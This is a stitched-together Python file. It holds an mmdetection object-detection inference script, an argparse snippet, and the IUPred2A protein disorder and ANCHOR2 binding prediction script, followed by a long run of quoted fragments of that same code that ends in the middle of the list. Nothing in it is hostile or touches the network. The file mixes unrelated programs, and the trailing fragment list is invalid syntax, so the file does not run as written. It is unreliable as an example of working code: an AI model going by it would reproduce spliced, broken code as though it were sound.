from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot, show_result
import os.path as osp
from app import *

debug = False  # only for debug


def load_result():
    lines = ""
    with open("test_image/standard_result_6411.txt", "r") as f:
        lines = f.read()
    return lines


def main():
    # detection debug
    if debug is True:
        print(load_result())
        return
    path = sys.path[0]
    # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py'
    # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth'
    config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py'
    checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth'
    model = init_detector(config, checkpoint)
    my_config.set('classes', model.CLASSES)
    # print(model)
    img = path + '/test.jpg'
    if len(sys.argv) > 1:
        img = sys.argv[1]
    print(img)
    result = inference_detector(model, img)
    out_file = osp.splitext(img)[0] + "_result.png"
    # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05)
    show_result(img, result, model.CLASSES, out_file=out_file)
    print("out_file:%s" % out_file)


if __name__ == '__main__':
    main()
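# The script falls back to '<script dir>/test.jpg' unless an image path is
# given as the first command-line argument. A hedged, stdlib-only sketch of
# the same argument handling with argparse (the flag layout is mine; the
# original reads bare sys.argv):
import argparse
import os.path as osp

parser = argparse.ArgumentParser(description='Run Faster R-CNN inference on one image.')
parser.add_argument('img', nargs='?', default='test.jpg',
                    help='input image (defaults to test.jpg next to the script)')
args = parser.parse_args()
out_file = osp.splitext(args.img)[0] + '_result.png'  # same naming rule as the script
print('out_file:%s' % out_file)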
#!/usr/bin/env python3
# IUPred2A reference script: per-residue disorder prediction (IUPred2) plus
# optional disordered binding region prediction (ANCHOR2).
import sys
import textwrap
import math
import os
from Bio import SeqIO


def avg(lst):
    return sum(lst) / len(lst)


def aa_freq(_seq):
    _freq = {}
    for _aa in _seq:
        if _aa in _freq:
            _freq[_aa] += 1
        else:
            _freq[_aa] = 1
    for _aa, _ins in _freq.items():
        _freq[_aa] = _ins / len(_seq)
    return _freq


def read_matrix(matrix_file):
    _mtx = {}
    with open(matrix_file, "r") as _fhm:
        for _line in _fhm:
            if _line.split()[0] in _mtx:
                _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])
            else:
                _mtx[_line.split()[0]] = {}
                _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])
    return _mtx


def read_histo(histo_file):
    hist = []
    h_min = float("inf")
    h_max = -float("inf")
    with open(histo_file, "r") as fnh:
        for _line in fnh:
            if _line.startswith("#"):
                continue
            if float(_line.split()[1]) < h_min:
                h_min = float(_line.split()[1])
            if float(_line.split()[1]) > h_max:
                h_max = float(_line.split()[1])
            hist.append(float(_line.split()[-1]))
    h_step = (h_max - h_min) / (len(hist))
    return hist, h_min, h_max, h_step


def read_seq(fasta_file):
    _seq = ""
    with open(fasta_file) as file_handler:
        for _line in file_handler:
            if _line.startswith(">"):
                continue
            _seq += _line.strip()
    return _seq


def smooth(energy_list, window):
    weighted_energy_score = [0] * len(energy_list)
    for idx in range(len(energy_list)):
        weighted_energy_score[idx] = avg(
            energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)])
    return weighted_energy_score


def iupred(seq, mode):
    if mode == "short":
        lc = 1
        uc = 25
        wc = 10
        mtx = read_matrix("{}/data/iupred2_short_energy_matrix".format(PATH))
        histo, histo_min, histo_max, histo_step = read_histo("{}/data/short_histogram".format(PATH))
    elif mode == 'glob':
        lc = 1
        uc = 100
        wc = 15
        mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH))
        histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH))
    else:
        lc = 1
        uc = 100
        wc = 10
        mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH))
        histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH))
    unweighted_energy_score = [0] * len(seq)
    weighted_energy_score = [0] * len(seq)
    iupred_score = [0] * len(seq)
    for idx in range(len(seq)):
        freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] +
                           seq[idx + lc + 1:idx + uc + 1])
        for aa, freq in freq_dct.items():
            try:
                unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq
            except KeyError:
                unweighted_energy_score[idx] += 0
    if mode == 'short':
        for idx in range(len(seq)):
            for idx2 in range(idx - wc, idx + wc + 1):
                if idx2 < 0 or idx2 >= len(seq):
                    weighted_energy_score[idx] += -1.26
                else:
                    weighted_energy_score[idx] += unweighted_energy_score[idx2]
            weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1))
    else:
        weighted_energy_score = smooth(unweighted_energy_score, wc)
    glob_text = ""
    if mode == 'glob':
        gr = []
        in_gr = False
        beg, end = 0, 0
        for idx, val in enumerate(weighted_energy_score):
            if in_gr and val <= 0.3:
                gr.append({0: beg, 1: end})
                in_gr = False
            elif in_gr:
                end += 1
            if val > 0.3 and not in_gr:
                beg = idx
                end = idx
                in_gr = True
        if in_gr:
            gr.append({0: beg, 1: end})
        mgr = []
        k = 0
        kk = 1
        if gr:
            beg = gr[0][0]
            end = gr[0][1]
            nr = len(gr)
            while k < nr:
                # Merge globular regions separated by fewer than 45 residues,
                # and drop merged regions shorter than 35 residues.
                if kk < nr and gr[kk][0] - end < 45:
                    beg = gr[k][0]
                    end = gr[kk][1]
                    kk += 1
                elif end - beg + 1 < 35:
                    k += 1
                    if k < nr:
                        beg = gr[k][0]
                        end = gr[k][1]
                else:
                    mgr.append({0: beg, 1: end})
                    k = kk
                    kk += 1
                    if k < nr:
                        beg = gr[k][0]
                        end = gr[k][1]
        # Globular domains are rendered in uppercase within a lowercased sequence.
        # NOTE: if seq is a SeqIO record, these slices are records, not strings.
        seq = seq.lower()
        nr = 0
        res = ""
        for i in mgr:
            res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper()
            nr = i[1] + 1
        res += seq[nr:]
        res = " ".join([res[i:i + 10] for i in range(0, len(res), 10)])
        glob_text += "Number of globular domains: {}\n".format(len(mgr))
        for n, i in enumerate(mgr):
            glob_text += " globular domain {}.\t{}-{}\n".format(n + 1, i[0] + 1, i[1] + 1)
        glob_text += "\n".join(textwrap.wrap(res, 70))
    for idx, val in enumerate(weighted_energy_score):
        if val <= histo_min + 2 * histo_step:
            iupred_score[idx] = 1
        elif val >= histo_max - 2 * histo_step:
            iupred_score[idx] = 0
        else:
            iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))]
    return iupred_score, glob_text


def anchor2(seq, iupred_scores):
    local_window_size = 41
    iupred_window_size = 30
    local_smoothing_window = 5
    par_a = 0.0013
    par_b = 0.26
    par_c = 0.43
    iupred_limit = par_c - (par_a / par_b)
    mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH))
    interface_comp = {}
    with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn:
        for line in _fn:
            interface_comp[line.split()[1]] = float(line.split()[2])
    local_energy_score = [0] * len(seq)
    interface_energy_score = [0] * len(seq)
    energy_gain = [0] * len(seq)
    for idx in range(len(seq)):
        freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] +
                           seq[idx + 2:idx + local_window_size + 1])
        for aa, freq in freq_dct.items():
            try:
                local_energy_score[idx] += mtx[seq[idx]][aa] * freq
            except KeyError:
                local_energy_score[idx] += 0
        for aa, freq in interface_comp.items():
            try:
                interface_energy_score[idx] += mtx[seq[idx]][aa] * freq
            except KeyError:
                interface_energy_score[idx] += 0
        energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx]
    iupred_scores = smooth(iupred_scores, iupred_window_size)
    energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window)
    anchor_score = [0] * len(seq)
    for idx in range(len(seq)):
        sign = 1
        if energy_gain[idx] < par_b and iupred_scores[idx] < par_c:
            sign = -1
        corr = 0
        if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0:
            corr = (par_a / (iupred_scores[idx] - par_c)) + par_b
        anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c)
        # Squash the raw score to (0, 1) with a fitted logistic.
        anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116)))
    return anchor_score


PATH = os.path.dirname(os.path.realpath(__file__))
help_msg = """Usage: {} (options) (seqfile) (iupred type)
\tAvailable types: "long", "short", "glob"
Options
\t-d str - Location of data directory (default='./')
\t-a - Enable ANCHOR2 prediction
""".format(sys.argv[0])
if len(sys.argv) < 2:
    sys.exit(help_msg)
if not os.path.isfile(sys.argv[-2]):
    sys.exit('Input sequence file not found at {}!\n{}'.format(sys.argv[-2], help_msg))
if not os.path.isdir(PATH):
    sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg))
if '-d' in sys.argv:
    PATH = sys.argv[sys.argv.index('-d') + 1]
    if not os.path.isdir(os.path.join(PATH, 'data')):
        sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg))
if sys.argv[-1] not in ['short', 'long', 'glob']:
    sys.exit('Wrong iupred2 option {}!\n{}'.format(sys.argv[-1], help_msg))
# Print output message with run parameters
print("""# IUPred2A: context-dependent prediction of protein disorder as a function of redox state and protein binding
# <NAME>, <NAME>, <NAME>
# Nucleic Acids Research 2018;46(W1):W329-W337.
#
# Prediction type: {}
# Prediction output""".format(sys.argv[-1]))
# Use a SeqIO parser to support analysing multiple sequences in one run.
sequences = SeqIO.parse(sys.argv[-2], "fasta")
for sequence in sequences:
    # Print the individual sequence identifier for later parsing.
    print(f">{sequence.id}")
    iupred2_result = iupred(sequence, sys.argv[-1])
    if '-a' in sys.argv:
        if sys.argv[-1] == 'long':
            anchor2_res = anchor2(sequence, iupred2_result[0])
        else:
            # ANCHOR2 is defined on the long-disorder profile.
            anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0])
    if sys.argv[-1] == 'glob':
        print(iupred2_result[1])
    if '-a' in sys.argv:
        print("# POS\tRES\tIUPRED2\tANCHOR2")
    else:
        print("# POS\tRES\tIUPRED2")
    for pos, residue in enumerate(sequence):
        print('{}\t{}\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end="")
        if '-a' in sys.argv:
            print("\t{:.4f}".format(anchor2_res[pos]), end="")
        print()  # line terminator; the tail of this loop is truncated in the source
"end = gr[k][1] seq = seq.lower() nr = 0 res = \"\" for",
"histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score =",
"file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq",
"gr[k][1] seq = seq.lower() nr = 0 res = \"\" for i in",
"print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1,",
"if kk < nr and gr[kk][0] - end < 45: beg = gr[k][0]",
"\\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory (default='./') \\t-a",
"for idx2 in range(idx - wc, idx + wc + 1): if idx2",
"sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print",
"= 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return",
"{} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis",
"- 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min)",
"Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq =",
"# Add SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2],",
"0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end += 1",
"energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx]",
"float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist",
"else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr",
"_freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with",
"= (h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list,",
"wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score",
"== 'glob': gr = [] in_gr = False beg, end = 0, 0",
"of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular",
"iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx] > iupred_limit",
"local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0]",
"= gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk += 1",
"of redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids",
"histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx]",
"(energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 /",
"found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH,",
"idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window +",
"- window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq =",
"* (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968",
"in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory",
"= {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2])",
"h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line",
"beg, 1: end}) mgr = [] k = 0 kk = k +",
"h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in fnh: if",
"not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv:",
"_freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq)",
"if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"#",
"histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc",
"print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in sys.argv: print(\"\\t{:.4f}\".format(anchor2_res[pos]), end=\"\") print()",
"[] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for",
"len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0,",
"weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr =",
"if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min)",
"+ wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if",
"range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx +",
">= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx -",
"1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score",
"if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence,",
"[0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0,",
"read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]]",
"+ 10] for i in range(0, len(res), 10)]) glob_text += \"Number of globular",
"= os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\",",
"+= \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1)",
"except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)):",
"histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] -",
"anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in",
"sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence,",
"kk += 1 if k < nr: beg = gr[k][0] end = gr[k][1]",
"seq.lower() nr = 0 res = \"\" for i in mgr: res +=",
"wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif",
"idx + wc + 1): if idx2 < 0 or idx2 >= len(seq):",
"\\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data directory",
"end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val",
"< 35: k += 1 if k < nr: beg = gr[k][0] end",
"help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of",
"in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if",
"kk kk += 1 if k < nr: beg = gr[k][0] end =",
"{}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction",
"end = gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk +=",
"1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob':",
"\" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text",
"10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr):",
"1 elif end - beg + 1 < 35: k += 1 if",
"in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1,",
"os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\",",
"_line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] =",
"= [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx -",
"2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 *",
"h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score =",
"[0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq)",
"not in_gr: beg = idx end = idx in_gr = True if in_gr:",
"sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"#",
"iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\")",
"_line.strip() return _seq def iupred(seq, mode): if mode == \"short\": lc = 1",
"return _seq def iupred(seq, mode): if mode == \"short\": lc = 1 uc",
"_fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] *",
"if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode): if mode",
"== 'glob': lc = 1 uc = 100 wc = 15 mtx =",
"in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr = [] k",
"[0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list),",
"iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A:",
"iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c",
"read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc = 10 mtx =",
"analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual",
"freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx",
"else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a'",
"1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except",
"'-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res",
"in_gr = False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score):",
"KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa]",
"POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if",
"1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except",
"mode == 'glob': gr = [] in_gr = False beg, end = 0,",
"textwrap import math import os from Bio import SeqIO def avg(lst): return sum(lst)",
"1 if gr: beg = gr[0][0] end = gr[0][1] nr = len(gr) while",
"iupred(seq, mode): if mode == \"short\": lc = 1 uc = 25 wc",
"val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] =",
"* len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx",
"sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in",
"= False elif in_gr: end += 1 if val > 0.3 and not",
"_mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx",
"= [0] * len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)):",
"= [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh:",
"in_gr: end += 1 if val > 0.3 and not in_gr: beg =",
"message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a",
"read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for _line in _fhm:",
"gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0 res = \"\"",
"par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c -",
"freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores =",
"1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins",
"in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {}",
"len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc,",
"+ 2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2",
"['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with",
"* (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {}",
"0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a /",
"i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1]",
"_seq += _line.strip() return _seq def iupred(seq, mode): if mode == \"short\": lc",
"interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx]",
"sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long',",
"- par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx]",
"idx in range(len(seq)): for idx2 in range(idx - wc, idx + wc +",
"or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /=",
"= 0 res = \"\" for i in mgr: res += seq[nr:i[0]] +",
"1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else:",
"< 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2],",
"not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong",
"gr[kk][0] - end < 45: beg = gr[k][0] end = gr[kk][1] kk +=",
"sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if",
"def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for _line in",
"<= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end +=",
"2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] +=",
"seq[idx + lc + 1:idx + uc + 1]) for aa, freq in",
"+ 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq",
"# Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein",
"binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction",
"nr = len(gr) while k < nr: if kk < nr and gr[kk][0]",
"protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # #",
"sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\")",
"sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq: if",
"(options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str -",
"read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc =",
"< 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2]",
"(par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] +",
"if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa,",
"'short': for idx in range(len(seq)): for idx2 in range(idx - wc, idx +",
"1 if k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0:",
"glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5",
"disorder as a function of redox state and protein binding # <NAME>, <NAME>,",
"multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: #",
"in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr",
"with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0] in _mtx:",
"len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for idx",
"= \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options",
"fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min",
"k = 0 kk = k + 1 if gr: beg = gr[0][0]",
"+ 1 < 35: k += 1 if k < nr: beg =",
"1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else:",
"- end < 45: beg = gr[k][0] end = gr[kk][1] kk += 1",
"'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos,",
"as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return",
"= 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val <=",
"POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue,",
"and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. #",
"mgr.append({0: beg, 1: end}) k = kk kk += 1 if k <",
"pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in",
"for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def",
